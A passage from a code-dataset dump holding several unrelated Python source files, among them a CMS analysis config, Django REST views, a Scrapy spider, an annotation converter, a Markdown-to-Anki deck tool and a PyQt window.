'resolution_EXO_MUMU.root'\n\nif ttbar:\n process.source.fileNames = file_list(Samples.ttbar_samples[0].dataset,False)\n outfile = 'resolution_ttbar.root'\n process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10000) )\n\nif dyjets:\n process.source.fileNames = file_list(Samples.dyjets_samples[0].dataset,False)\n outfile = 'resolution_dyjets.root'\n process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10000) )\n\nprocess.TFileService = cms.Service('TFileService', fileName = cms.string(outfile))\n\nprocess.load('JChaves.WR_Analyzer.resolution_cfi')\n\nprocess.p = cms.Path(process.ana)\n\n\n###################################################################################################\n###################################################################################################\n# Use my CRABSubmitter for now:\n# crab2_submit(name,nevents,name modifiers)\n# name = nstep -> MakeSamples\n# name = ttbar\n# name = dyjets\nif __name__ == '__main__' and hasattr(sys, 'argv') and submit:\n from JChaves.Tools.CRABSubmitter import *\n \n if ttbar:\n #crab2_submit('ttbar',-1,'all')\n crab3_submit('ttbar',-1,'all')\n if dyjets:\n #for x in ['HT-100To200','HT-200To400','HT-400To600','HT-600ToInf']:\n for x in ['M-200To400','M-400To800','M-800To1400','M-1400To2300','M-3500To4500','M-4500To6000','M-6000To7500','M-7500To8500',]:\n #crab2_submit('dyjets',-1,x)\n crab3_submit('dyjets',-1,x)\n","sub_path":"WR_Analyzer/test/resolution.py","file_name":"resolution.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407218396","text":"from rest_framework import generics, views, status\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\n\nfrom .models import User\nfrom .permissions import AdminPermission\nfrom .serializers import (\n UserSerializer,\n RestrictedUserSerializer,\n UserRegisterSerializer,\n UserConfirmSerializer,\n)\n\n\nclass UserList(generics.ListCreateAPIView):\n\n serializer_class = UserSerializer\n permission_classes = [AdminPermission, ]\n queryset = User.objects.all()\n\n\nclass UserDetail(generics.RetrieveUpdateDestroyAPIView):\n\n serializer_class = UserSerializer\n permission_classes = [AdminPermission, ]\n queryset = User.objects.all()\n\n\nclass RestrictedUserDetail(generics.RetrieveUpdateAPIView):\n\n serializer_class = RestrictedUserSerializer\n\n def get_object(self):\n return self.request.user\n\n\nclass UserRegisterView(views.APIView):\n\n permission_classes = [AllowAny,]\n serializer_class = UserRegisterSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)\n serializer.save()\n\n return Response(serializer.data, status.HTTP_200_OK)\n\n\nclass UserConfirmView(views.APIView):\n\n permission_classes = [AllowAny,]\n serializer_class = UserConfirmSerializer\n\n def put(self, request):\n serializer = self.serializer_class(data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)\n email = serializer.validated_data.get('email')\n token = serializer.validated_data.get('app_id')\n user = User.objects.filter(email=email, app_id=token).first()\n if not user:\n body = {'deteils': 'INCORRECT_TOKEN'}\n return Response(body, status.HTTP_400_BAD_REQUEST)\n user.is_confirmed = True\n user.save()\n return Response(serializer.data, status.HTTP_200_OK)\n","sub_path":"test_app/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"593709688","text":"# -*- coding: utf8 -*-\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\n\nTEST_SCALE = 100\n\n# Note that OriginalCategoryName is hardcoded to electronik.\n\n\nclass TestberichteBlogger_deSpider(AlaSpider):\n name = 'testberichte-blogger_de'\n allowed_domains = ['testberichte-blogger.de']\n start_urls = ['http://www.testberichte-blogger.de/elektronik']\n\n def parse(self, response):\n sub_category_urls = self.extract_list(response.xpath(\n \"//div[@class='randrund']/p/a/@href|//div[\"\n \"@class='content']/p/a/@href\"))\n\n if sub_category_urls:\n for sub_category_url in sub_category_urls:\n yield response.follow(sub_category_url,\n callback=self.parse_category)\n\n def parse_category(self, response):\n date_xpath = self.extract(response.xpath(\n \"substring-after(//div/h1, '(')\"))\n date = date_xpath.split(')')\n date = date[0]\n category_item_xpath = \"//td/a/@href\"\n category_item_urls = self.extract_list(response.xpath(\n category_item_xpath))\n\n for category_item_url in category_item_urls:\n yield response.follow(category_item_url,\n callback=self.parse_review_product,\n meta={'date': date})\n\n def get_product_name(self, response):\n name_xpath = self.extract(response.xpath(\"//h1/text()\"))\n name = name_xpath.split(u'–')\n if name[0]:\n productname = name[0].replace('Test', '')\n else:\n productname = name_xpath.replace('Test', '')\n\n return productname\n\n def parse_review_product(self, response):\n product_xpaths = {\n 'PicURL': '(//div/a/img)[1]/@src',\n 'source_internal_id': \"substring-after(//link[@rel='shortlink']\"\n \"/@href, '=')\"\n }\n\n product = self.init_item_by_xpaths(response, 'product', product_xpaths)\n\n product[\"ProductName\"] = self.get_product_name(response)\n\n product[\"OriginalCategoryName\"] = \"elektronik\"\n\n yield product\n\n review_xpaths = {\n 'TestTitle': '//h1/text()',\n 'source_internal_id': \"substring-after(//link[@rel='shortlink']\"\n \"/@href, '=')\",\n \"SourceTestRating\": \"substring-before(\"\n \"//td/strong/strong/text(),'%')\",\n 'TestSummary': '//p/i/text()',\n 'TestPros': \"//div/span[contains(text(),'+')]/text()|\"\n \"//div/span/font/font[contains(text(),'+')]/text()\",\n 'TestCons': \"//div/span[contains(text(),' - ')]/text()|\"\n \"//div/span/font/font[contains(text(),' - ')]/text()|\"\n u\"//div/span[contains(text(),'– ')]/text()\"\n }\n\n review = self.init_item_by_xpaths(response, 'review', review_xpaths)\n\n date = response.meta['date']\n\n if date:\n review[\"TestDateText\"] = date\n\n if review[\"SourceTestRating\"]:\n review[\"SourceTestScale\"] = TEST_SCALE\n\n if review[\"TestCons\"]:\n review[\"TestCons\"] = review[\"TestCons\"].replace('-', ''\n ).replace(u'–', '')\n\n if review[\"TestPros\"]:\n review[\"TestPros\"] = review[\"TestPros\"].replace('+', '')\n\n review[\"ProductName\"] = self.get_product_name(response)\n\n review['DBaseCategoryName'] = 'PRO'\n\n yield review\n","sub_path":"alascrapy/spiders/testberichte-blogger_de.py","file_name":"testberichte-blogger_de.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18902621","text":"from bs4 import BeautifulSoup\r\nfrom imutils import paths\r\nimport os\r\n\r\n# initialize the base path for the logos dataset\r\nBASE_PATH = \"./\"\r\n\r\nannot_path = \"SIMS_VOC_Annotations2/all_annot_xml/\"\r\n\r\n# build the path to the annotations and input images\r\ntrain_images_path = \"SIMS_Dataset/train_images/\"\r\nval_images_path = \"SIMS_Dataset/validation_images/\"\r\ntest_images_path = \"SIMS_Dataset/test_images/\"\r\n\r\n# build the path to the output training and test .csv files\r\ntrain_csv = os.path.sep.join([BASE_PATH, 'train.csv'])\r\nval_csv = os.path.sep.join([BASE_PATH, 'val.csv'])\r\ntest_csv = os.path.sep.join([BASE_PATH, 'test.csv'])\r\n\r\n# build the path to the output classes CSV files\r\nclasses_csv = os.path.sep.join([BASE_PATH, 'classes.csv'])\r\n\r\n# build the path to the output predictions dir\r\noutput_dir = os.path.sep.join([BASE_PATH, 'predictions'])\r\n\r\ntrain_image_paths = list(paths.list_files(train_images_path))\r\nval_image_paths = list(paths.list_files(val_images_path))\r\ntest_image_paths = list(paths.list_files(test_images_path))\r\n# print(val_image_paths)\r\n\r\n# create the list of datasets to build\r\ndataset = [ (\"train\", train_image_paths, train_csv),\r\n (\"val\", val_image_paths, val_csv),\r\n (\"test\", test_image_paths, test_csv)]\r\n# initialize the set of classes we have\r\nCLASSES = set()\r\n\r\nfor (dType, imagePaths, outputCSV) in dataset:\r\n # load the contents\r\n print(\"[INFO] creating '{}' set...\".format(dType))\r\n print(\"[INFO] {} total images in '{}' set\".format(len(imagePaths), dType))\r\n\r\n # open the output CSV file\r\n csv = open(outputCSV, \"w\")\r\n\r\n # loop over the image paths\r\n for imagePath in imagePaths:\r\n # build the corresponding annotation path\r\n fname = imagePath.split(os.path.sep)[-1]\r\n fname = \"{}.xml\".format(fname[:fname.rfind(\".\")])\r\n annotPath = os.path.join(annot_path, os.path.basename(fname))\r\n\r\n # load the contents of the annotation file and buid the soup\r\n contents = open(annotPath).read()\r\n soup = BeautifulSoup(contents, \"html.parser\")\r\n\r\n # extract the image dimensions\r\n w = int(soup.find(\"width\").string)\r\n h = int(soup.find(\"height\").string)\r\n\r\n for o in soup.find_all(\"object\"):\r\n #extract the label and bounding box coordinates\r\n label = o.find(\"name\").string\r\n xMin = int(float(o.find(\"xmin\").string))\r\n yMin = int(float(o.find(\"ymin\").string))\r\n xMax = int(float(o.find(\"xmax\").string))\r\n yMax = int(float(o.find(\"ymax\").string))\r\n\r\n # truncate any bounding box coordinates that fall outside\r\n # the boundaries of the image\r\n xMin = max(0, xMin)\r\n yMin = max(0, yMin)\r\n xMax = min(w, xMax)\r\n yMax = min(h, yMax)\r\n\r\n # ignore the bounding boxes where the minimum values are larger\r\n # than the maximum values and vice-versa due to annotation errors\r\n if xMin >= xMax or yMin >= yMax:\r\n continue\r\n elif xMax <= xMin or yMax <= yMin:\r\n continue\r\n\r\n # write the image path, bb coordinates, label to the output CSV\r\n row = [os.path.abspath(imagePath),str(xMin), str(yMin), str(xMax),\r\n str(yMax), str(label)]\r\n csv.write(\"{}\\n\".format(\",\".join(row)))\r\n\r\n # update the set of unique class labels\r\n CLASSES.add(label)\r\n\r\n # close the CSV file\r\n csv.close()\r\n\r\n print(\"[INFO] writing classes...\")\r\n csv = open(classes_csv, \"w\")\r\n rows = [\",\".join([c, str(i)]) for (i, c) in enumerate(CLASSES)]\r\n csv.write(\"\\n\".join(rows))\r\n csv.close()","sub_path":"Faster RCNN/voc_2_csv.py","file_name":"voc_2_csv.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"169647869","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport argparse\nimport numpy as np\nimport spacy_udpipe\nimport pandas as pd\nimport copy\n\nfrom MWEPreProcessor import MWEPreProcessor\nfrom WordEmbedding import set_fastText_word_embeddings\nfrom Operations import load_pickle, get_logger, dump_pickle\nfrom MWEIdentifier import MWEIdentifier\n\nclass ERMIEvaluate:\n def __init__(self, root_path):\n self.lang = 'TR'\n self.tag = 'gappy-crossy'\n self.embedding_type = 'headend'\n self.root_path = root_path\n self.input_path = self.root_path\n self.output_path = os.path.join(self.root_path, 'output', self.lang)\n gensim_name = \"gensim_\" + self.lang.lower()\n self.gensim_we_path = os.path.join(self.root_path, 'TR_model/Embeddings', gensim_name)\n\n self.mwe_write_path = os.path.join(self.root_path, \"output\")\n\n if not os.path.exists(self.mwe_write_path):\n os.makedirs(self.mwe_write_path)\n\n self.mwe_train_path = os.path.join(self.root_path, 'TR_model', 'train.pkl')\n\n self.logger = get_logger(os.path.join(self.root_path, 'TR_model'))\n\n self.params = { 'TR': {'n_units': 20, 'dropout': [0.1, 0.1], 'batch_size': 32, 'epochs': 20},\n }\n\n self.mwe = load_pickle(self.mwe_train_path)\n \n self.mwe_identifier = MWEIdentifier(self.lang, self.embedding_type, self.mwe, self.logger, self.mwe_write_path)\n self.mwe_identifier.set_params(self.params[self.lang])\n self.mwe_identifier.set_train()\n self.mwe_identifier.build_model()\n \n def evaluate(self, sentence):\n \n nlp = spacy_udpipe.load_from_path(lang=\"tr\",\n path=\"./turkish-imst-ud-2.4-190531.udpipe\",\n meta={\"description\": \"Custom 'tr' model\"})\n text = sentence\n\n doc = nlp(text)\n udpiped_sentence = [(token.i + 1, token.text, token.lemma_, token.pos_, \"_\", \"_\", str(token.head), token.dep_.lower(), \"_\", \"_\", \"_\") for token in doc]\n self.mwe.test_sentences = [udpiped_sentence]\n new_corpus = pd.DataFrame(udpiped_sentence, columns=['ID', 'FORM', 'LEMMA', 'UPOS', 'XPOS', 'FEATS', 'HEAD', 'DEPREL',\n 'DEPS', 'MISC', 'PARSEME:MWE'])\n new_corpus['BIO'] = copy.deepcopy(new_corpus['PARSEME:MWE'])\n new_corpus[new_corpus['BIO'].isnull()] = 'space'\n new_corpus['BIO'] = copy.deepcopy(new_corpus['BIO'].apply(lambda x: x.strip()))\n space_row = {'ID':'space', 'FORM':'space', \"LEMMA\":'space', \"UPOS\":'space', \"XPOS\":'space', \"FEATS\":'space', \"HEAD\":'space', \"DEPREL\":'space', \"DEPS\":'space', \"MISC\":'space', \"PARSEME:MWE\":'space', \"BIO\":'space'}\n test_corpus = new_corpus.append(space_row, ignore_index=True)\n self.mwe._test_corpus = test_corpus\n \n self.mwe_identifier.mwe = self.mwe\n self.mwe_identifier.set_test()\n reload_path = os.path.join(self.root_path, 'TR_model', 'teacher-weights-last.hdf5')\n lines = self.mwe_identifier.predict_test_custom_model(reload_path)\n \n return lines\n","sub_path":"ERMIEvaluate.py","file_name":"ERMIEvaluate.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"585729984","text":"# Copyright (2015-2017) Hewlett Packard Enterprise Development LP\n# Copyright (2015-2017) Universidade Federal de Campina Grande\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport retrying\n\nfrom oslo_log import log as logging\n\nfrom ironic_oneviewd.conf import CONF\nfrom ironic_oneviewd.node_manager.manage import NodeManager\n\nLOG = logging.getLogger(__name__)\n\n\ndef do_manage_ironic_nodes():\n \"\"\"Show a list of OneView servers to be created as nodes in Ironic.\"\"\"\n node_manager = NodeManager()\n retry_interval_in_ms = CONF.DEFAULT.retry_interval * 1000\n\n @retrying.retry(wait_fixed=retry_interval_in_ms)\n def execute():\n try:\n node_manager.pull_ironic_nodes()\n except Exception as ex:\n LOG.error(ex)\n raise Exception(\"Continue trying...\")\n execute()\n","sub_path":"ironic-oneviewd/ironic_oneviewd/node_manager/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"558701672","text":"import logging\nimport requests\nimport json\nfrom datetime import date\n\nclass EstadoPingAPI:\n def __init__(self, env, catalog):\n self._state = 'INITIAL'\n self._status = 200\n self._text = ''\n self._env = env\n if (env == 'pro'):\n self._gw = 'apicp-gateway-vf.internal.vodafone.com'\n else:\n self._gw = 'apict-gateway-vf.internal.vodafone.com'\n self._catalog = catalog\n\n def ping(self):\n resul = ''\n try:\n response = requests.get(\"https://\" + self._gw + \"/vodafone-spain/\"\n + self._catalog + \"/ping/ping\", verify=False)\n if (response.status_code != self._status):\n resul = '[' + self._env + '][' + self._catalog + '][' + self._state + '] Status changed from ' + str(self._status) + ' to ' + str(response.status_code)\n self._status = response.status_code\n self._text = ''\n else:\n self._status = response.status_code\n if (response.status_code == 200):\n txt = json.dumps(response.json())\n state = self._state\n self.evalFecha(response.json()[\"fecha\"])\n if (state != self._state or self._text != txt):\n self._text = txt\n resul = '[' + self._env + '][' + self._catalog + '][' + self._state + '] ' + txt\n except:\n logging.exception('Exception calling API')\n resul: 'Error de conexión'\n finally:\n return resul\n \n def evalFecha(self, fecha):\n if (len(fecha) and fecha[6:8] == date.today().strftime('%d')):\n self._state = 'OK'\n else:\n self._state = 'KO'\n","sub_path":"apiConnect/EstadoPingAPI.py","file_name":"EstadoPingAPI.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"186109733","text":"import sys\n\nfrom generators import Generator\nfrom plugins import load_plugins\n\n\ndef find_parser(url, args):\n plugins = load_plugins()\n for plugin in plugins:\n if plugin.can_handle(url):\n return plugin.get_parser(url, args)\n raise Exception(\"No plugin for URL: %s\" % url)\n\n\ndef parse_args():\n args_len = len(sys.argv)\n if args_len > 1:\n url = sys.argv[1]\n else:\n raise Exception(\"First argument: URL\")\n args = args_len > 2 and sys.argv[2:]\n return url, args\n\n\nif __name__ == '__main__':\n url, args = parse_args()\n parser = find_parser(url, args)\n generator = Generator(parser)\n generator.write_xml(sys.stdout)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"491709676","text":"import hashlib\nimport itertools\nimport os\nimport re\nfrom pathlib import Path\n\nimport frontmatter\nimport genanki\nimport markdown\nimport typer\nfrom bs4 import BeautifulSoup, Comment\nfrom bs4.element import Tag\nfrom genanki.deck import Deck\nfrom genanki.model import Model\n\nfrom markdown_anki_decks.sync import sync_deck, sync_model\nfrom markdown_anki_decks.utils import print_success\n\napp = typer.Typer()\n\n\ndef version_callback(value: bool):\n from . import __version__\n\n if value:\n typer.echo(f\"Markdown Anki Decks: {__version__}\")\n raise typer.Exit()\n\n\n@app.command(\"convert\")\ndef convertMarkdown(\n input_dir: Path = typer.Argument(\n ...,\n help=\"The input directory. Contains markdown files which will be converted to anki decks.\",\n ),\n output_dir: Path = typer.Argument(\n ..., help=\"The output directory. Anki .apkg files will be written here.\"\n ),\n sync: bool = typer.Option(\n False,\n \"--sync\",\n help=\"Whether or not to synchronize the output with anki using anki connect.\",\n ),\n deck_title_prefix: str = typer.Option(\n \"\",\n \"--prefix\",\n help=\"Can be used to make your markdown decks part of a single subdeck. Anki uses `::` to indicate sub decks. `markdown-decks::` could be used to make all generated decks part of a single root deck `markdown-decks`\",\n ),\n delete_cards: bool = typer.Option(\n False,\n \"--delete\",\n help=\"Whether to delete cards from anki during sync. If sync is false this has no effect.\",\n ),\n cloze: bool = typer.Option(\n False,\n \"--cloze\",\n help=\"Whether to support cloze syntax\",\n ),\n version: bool = typer.Option(\n False, \"--version\", callback=version_callback, help=\"Show version information\"\n ),\n):\n\n # iterate over the source directory\n for root, _, files in os.walk(input_dir):\n for file in files:\n if is_markdown_file(file):\n deck = parse_markdown(\n os.path.join(root, file), deck_title_prefix, cloze\n )\n package = genanki.Package(deck)\n # add all image files to the package\n package.media_files = image_files(input_dir)\n path_to_pkg_file = os.path.join(output_dir, f\"{Path(file).stem}.apkg\")\n package.write_to_file(path_to_pkg_file)\n print_success(f\"Created apkg for deck {deck.name}\")\n if sync:\n sync_deck(deck, Path(path_to_pkg_file), delete_cards)\n for model in deck.models.values():\n sync_model(model)\n\n\nANKI_CLOZE_REGEXP = re.compile(r\"{{c\\d+::[\\s\\S]+?}}\")\n\n\ndef has_clozes(text):\n \"\"\"Checks whether text actually has cloze deletions.\"\"\"\n return bool(ANKI_CLOZE_REGEXP.search(text))\n\n\n# check if a tag is a question\ndef is_question_tag(tag: Tag):\n return tag.name == \"h2\" or (isinstance(tag, Tag) and tag.has_attr(\"data-question\"))\n\n\ndef parse_markdown(\n file: str, deck_title_prefix: str, generate_cloze_model: bool\n) -> Deck:\n metadata, markdown_string = frontmatter.parse(read_file(file))\n html = markdown.markdown(\n markdown_string,\n extensions=[\"fenced_code\", \"sane_lists\", \"tables\", \"codehilite\", \"md_in_html\"],\n )\n\n soup = BeautifulSoup(html, \"html.parser\")\n\n # strip all comments from the html\n comments = soup.findAll(text=lambda text: isinstance(text, Comment))\n for comment in comments:\n comment.extract()\n\n # get the deck title\n deck_title = Path(file).stem\n h1 = soup.h1\n if h1 is not None and h1.text:\n deck_title = h1.text\n deck_title = deck_title_prefix + deck_title\n\n # model for an anki deck\n model = genanki.Model(\n model_id=integer_hash(f\"{deck_title} model\"),\n name=f\"{deck_title} model\",\n fields=[{\"name\": \"Question\"}, {\"name\": \"Answer\"}, {\"name\": \"Guid\"}],\n templates=[\n {\n \"name\": \"Card 1\",\n \"qfmt\": '
{{Question}}
',\n \"afmt\": '
{{Question}}

{{Answer}}
',\n },\n ],\n css=read_css(file, metadata),\n model_type=Model.FRONT_BACK,\n )\n\n # model for an anki deck\n cloze_model = genanki.Model(\n model_id=integer_hash(f\"{deck_title} cloze model\"),\n name=f\"{deck_title} cloze model\",\n fields=[{\"name\": \"Question\"}, {\"name\": \"Answer\"}, {\"name\": \"Guid\"}],\n templates=[\n {\n \"name\": \"Card 1\",\n \"qfmt\": '
{{cloze:Question}}
',\n \"afmt\": '
{{cloze:Question}}

{{Answer}}
',\n },\n ],\n css=read_css(file, metadata),\n model_type=Model.CLOZE,\n )\n\n # create the deck\n deck_id = integer_hash(deck_title)\n deck = genanki.Deck(deck_id=deck_id, name=deck_title)\n\n # add model to deeck\n deck.add_model(model)\n if generate_cloze_model:\n deck.add_model(cloze_model)\n\n # get the notes\n note_headers = soup.find_all(is_question_tag, recursive=False)\n for header in note_headers:\n # the question is the header\n question = header\n\n # the contents are everything until the next header\n contents = list(\n itertools.takewhile(\n lambda el: not is_question_tag(el), header.next_siblings\n )\n )\n\n # wrap the contents in a section tag. the section is the answer.\n answer = soup.new_tag(\"section\")\n if len(contents) > 0:\n contents[0].wrap(answer)\n for content in contents[1:]:\n answer.append(content)\n\n # create the note using the simple model\n note = FrontIdentifierNote(\n deck_id,\n model=(\n cloze_model\n if generate_cloze_model\n and has_clozes(soup_to_plaintext_string(question))\n else model\n ),\n fields=[soup_to_html_string(question), soup_to_html_string(answer)],\n )\n deck.add_note(note)\n\n return deck\n\n\n# genanki Note which has a unique id based on the deck and the question\n# also has a field for the guid so the guid can be accessed in queries\nclass FrontIdentifierNote(genanki.Note):\n def __init__(self, deck_id, model=None, fields=None, sort_field=None, tags=None):\n guid = genanki.guid_for(fields[0], deck_id)\n if fields is not None:\n fields.append(guid)\n super().__init__(\n model=model, fields=fields, sort_field=sort_field, tags=tags, guid=guid\n )\n\n\n# convert beautiful soup object to a string\ndef soup_to_html_string(soup):\n return soup.prettify(formatter=\"html5\")\n\n\ndef soup_to_plaintext_string(soup):\n return soup.get_text()\n\n\n# convert a file to a string\ndef read_file(file):\n with open(file, \"r\", encoding=\"utf-8\") as f:\n markdown_string = f.read()\n return markdown_string\n\n\n# check if a file is a markdown file\ndef is_markdown_file(file):\n # TODO(lukemurray): parameterize markdown extensions?\n return file.endswith(\".md\")\n\n\n# convert a string into a random integer from 0 to 1<<31 exclusive\n# used to create model and deck ids\n# from https://stackoverflow.com/a/42089311/11499360\ndef integer_hash(s: str):\n return int(hashlib.sha256(s.encode(\"utf-8\")).hexdigest(), 16) % (1 << 31)\n\n\n# get all the image files in a directory\ndef image_files(source: Path):\n return list(\n str(p)\n for p in itertools.chain(\n source.rglob(\"*.jpg\"),\n source.rglob(\"*.jpeg\"),\n source.rglob(\"*.png\"),\n source.rglob(\"*.gif\"),\n )\n )\n\n\ndef read_css(file: str, metadata: dict) -> str:\n # merge the css files\n markdown_css = Path(__file__).parent / \"./styles/markdown.css\"\n pygments_css = Path(__file__).parent / \"./styles/pygments.css\"\n pygments_dark_css = Path(__file__).parent / \"./styles/pygments-dark.css\"\n custom_css_contents = []\n if \"css\" in metadata:\n custom_css_paths = metadata[\"css\"]\n if not isinstance(custom_css_paths, list):\n custom_css_paths = [custom_css_paths]\n for custom_css_path in custom_css_paths:\n custom_css_contents.append(\n (Path(file).parent / custom_css_path).read_text(\"utf-8\")\n )\n\n custom_css = \"\\n\".join(custom_css_contents)\n\n return f'{markdown_css.read_text(\"utf-8\")}\\n{pygments_css.read_text(\"utf-8\")}\\n{pygments_dark_css.read_text(\"utf-8\")}\\n{custom_css}'\n\n\ndef main():\n app()\n","sub_path":"markdown_anki_decks/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":8762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563817072","text":"import fnmatch\nimport os\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QMainWindow, QAction, QFileDialog\nfrom PyQt5.QtCore import pyqtSlot\n\nfrom models.tasksModel import TasksModel\nfrom models.studentsModel import StudentsModel\n\nfrom views.mainWindow_ui import Ui_MainWindow\n\nclass MainView(QMainWindow):\n def __init__(self, model, main_controller):\n super().__init__()\n\n self._model = model\n self._main_controller = main_controller\n self._ui = Ui_MainWindow()\n self._ui.setupUi(self)\n self.initUI()\n self.con()\n\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n\n openFile = QAction(QIcon('open.png'), 'Открыть', self)\n openFile.setShortcut('Ctrl+O')\n openFile.setStatusTip('Открыть директорию')\n openFile.triggered.connect(self.showDialog)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('Файл')\n fileMenu.addAction(openFile)\n\n def con(self):\n self._ui.themeComboBox.currentIndexChanged.connect(self.fun)\n\n def showDialog(self):\n dir = str(QFileDialog.getExistingDirectory(self, 'Выберите папкy', '/home/valerie/University/Diploma/Math-packages-course-automatization/mp2017-collect'))\n if dir:\n self._model.setDirectory(dir)\n self.statusBar().showMessage(dir)\n listOfTasks = sorted(getListOfFiles(dir, \"*.m\"))\n i = 0\n while(i < len(listOfTasks)):\n self._ui.themeComboBox.addItem(listOfTasks[i].split(dir)[1].split('/')[1])\n i = i + 1\n\n self.tasksModel = TasksModel(listOfTasks, dir)\n self._ui.tasksTableView.setModel(self.tasksModel)\n self._ui.tasksTableView.horizontalHeader().hide()\n self._ui.tasksTableView.horizontalHeader().setStretchLastSection(True)\n\n problem = '/octave-1/'\n self.showStudents(dir, problem)\n\n def showStudents(self, dir, problem):\n dirName = dir + problem\n listOfStudentsDir = getListOfFiles(dirName, \"*.m\")\n\n studentsList = list()\n for i in range(len(listOfStudentsDir)):\n files = os.listdir(listOfStudentsDir[i])\n for entry in files:\n if fnmatch.fnmatch(entry, '*.txt'):\n studentsList.insert(i, entry.split(\"STUDENT - \")[1].split(\".txt\")[0])\n print(studentsList)\n\n self.studentsModel = StudentsModel(studentsList)\n self._ui.studentsTableView.setModel(self.studentsModel)\n self._ui.studentsTableView.horizontalHeader().hide()\n self._ui.studentsTableView.horizontalHeader().setStretchLastSection(True)\n\n def fun(self, i):\n print(i)\n\n #@pyqtSlot(str)\n #def on_directory_changed(self, value):\n # print(\"smth\")\n # self._ui.programPlainTextEdit.setPlainText(value)\n\n'''\n # connect widgets to controller\n self._ui.spinBox_amount.valueChanged.connect(self._main_controller.change_amount)\n self._ui.pushButton_reset.clicked.connect(lambda: self._main_controller.change_amount(0))\n\n # listen for model event signals\n self._model.amount_changed.connect(self.on_amount_changed)\n self._model.even_odd_changed.connect(self.on_even_odd_changed)\n self._model.enable_reset_changed.connect(self.on_enable_reset_changed)\n\n # set a default value\n self._main_controller.change_amount(42)\n\n @pyqtSlot(int)\n def on_amount_changed(self, value):\n self._ui.spinBox_amount.setValue(value)\n\n @pyqtSlot(str)\n def on_even_odd_changed(self, value):\n self._ui.label_even_odd.setText(value)\n\n @pyqtSlot(bool)\n def on_enable_reset_changed(self, value):\n self._ui.pushButton_reset.setEnabled(value)\n'''\n\ndef getListOfFiles(dirName, pattern):\n # create a list of file and sub directories\n # names in the given directory\n listOfFile = os.listdir(dirName)\n allFiles = list()\n\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory\n if os.path.isdir(fullPath) & fnmatch.fnmatch(entry, pattern):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n return allFiles\n","sub_path":"views/main_view.py","file_name":"main_view.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"485950884","text":"import subprocess\nimport re\n\nfrom goopy_sched import GoopyTask\n\n\nclass WlStat(GoopyTask):\n\n def __init__(self, model, ifname, interval=5, delay=0):\n self._ifname = ifname\n self._model = model\n self._sp = re.compile('Signal level=([0-9]+)/100')\n\n self._update_model(False, 0)\n\n super().__init__(interval=interval, delay=delay)\n\n def fire(self):\n\n up = False\n signal = 0\n\n try:\n out = subprocess.check_output(['/sbin/iwconfig', self._ifname],\n universal_newlines=True,\n stderr=subprocess.DEVNULL)\n\n up = True\n for line in out.splitlines():\n if line.find('unassociated') > -1:\n up = False\n break\n else:\n match = self._sp.search(line)\n if match:\n signal = match.group(1)\n\n except subprocess.CalledProcessError:\n pass\n\n self._update_model(up, signal)\n\n def _update_model(self, up, signal):\n\n self._model.wl_up = up\n self._model.wl_signal = signal\n\n\nclass ConnStat(GoopyTask):\n\n def __init__(self, model, hostname, interval=30, delay=0):\n self._model = model\n self._hostname = hostname\n self._update_model(False)\n\n super().__init__(interval=interval, delay=delay)\n\n def fire(self):\n\n ok = False\n code = subprocess.call(['/bin/ping', '-q', '-c1', self._hostname],\n stderr=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL)\n if code == 0:\n ok = True\n\n self._update_model(ok)\n\n def _get_interval(self):\n return super()._get_interval() if self._model.conn_ok else 5\n\n def _update_model(self, ok):\n\n self._model.conn_ok = ok\n","sub_path":"goopy_net.py","file_name":"goopy_net.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515614461","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### Remarks / TODO:\n# -there are a few food items in MISC. TRANS\n# - add the nutrients present under different names 